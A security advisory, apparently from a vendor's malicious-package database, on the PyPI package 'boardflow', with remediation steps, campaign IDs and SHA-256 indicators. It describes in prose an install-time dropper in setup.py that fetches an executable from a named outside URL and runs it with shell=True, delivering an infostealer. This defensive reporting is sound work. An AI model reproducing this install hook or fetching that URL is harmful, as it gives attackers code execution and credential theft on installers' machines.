Which versions of boardflow are malicious?

The following PyPI versions of boardflow are flagged malicious: 1.0.0, 1.0.1. Treat any of these as compromised.

How do I remediate boardflow if I installed it?

Remove boardflow from your project and lockfile, then assume any secrets accessible to the build or runtime were exposed: rotate API keys, tokens, and credentials, and audit for unexpected outbound network activity or persistence. Use O3 Security's dependency scanner to confirm the package and its artifacts are fully purged across your stack.

Is boardflow part of a known attack campaign?

Yes — boardflow is associated with the IN-MAL-2026-006940, 2026-06-boardflow campaign. Packages in the same campaign often share infrastructure and payloads, so check whether any related packages are also in your dependency tree.

Can O3 Security detect boardflow in my codebase?

Yes. O3 Security's supply-chain scanner checks every dependency against known-malicious package intelligence at install time and in CI, blocking boardflow and packages like it before any post-install script runs.

Malicious package

boardflowPyPI

Malicious code in boardflow (PyPI) Remove it immediately and rotate any exposed credentials.

MAL-2026-6080

Immediate action

Remove the package, then rotate any secrets the build/runtime could reach.

pip uninstall boardflow

What this malware does

On pip install boardflow, setup.py spawns a background thread that fetches http://pooron.org/test.exe over plain HTTP into the OS temp directory and executes it via subprocess.Popen with shell=True, suppressing stdout/stderr. The destination domain is unrelated to the package's advertised purpose (a CLI Kanban tool), the URL is unpinned and unverified (no hash, no signature, plain HTTP allowing MITM tampering), and the fetched.exe is attacker-controlled content executed with the privileges of the installing user. This is a classic install-time dropper that yields arbitrary remote code execution on every installer's machine.

During installation, package downloads and executes a remote executable identified as infostealer. The executable contains a VSCode extension with a modified code variant that during initialization downloads and executes a JS script from hardcoded location. During analysis, the script was inaccessible.

Category: MALICIOUS - The campaign has clearly malicious intent, like infostealers.

Campaign: 2026-06-boardflow

Reasons (based on the campaign):

infostealer
The package overrides the install command in setup.py to execute malicious code during installation.
Downloads and executes a remote executable.
malware

Malicious versions

2 flagged

1.0.01.0.1

Indicators of compromise (SHA-256)

7a7f48df7609edb5bab9d9e572f093994d071165578a58032a69392d62b08b86

1ca250ab62e505dc679b9930d0ea3259c0e1bad68eee5690f9d434d1a8f1077e

Frequently asked questions

No. boardflow on PyPI has been identified as a malicious package (versions 1.0.0, 1.0.1 flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

IN-MAL-2026-0069402026-06-boardflow

References

Credits

Amazon Inspector · finder
Kamil Mańkowski (kam193) · reporter

Scan your dependencies

O3 Security blocks malicious packages like this at install time and in CI.

Supply-chain protection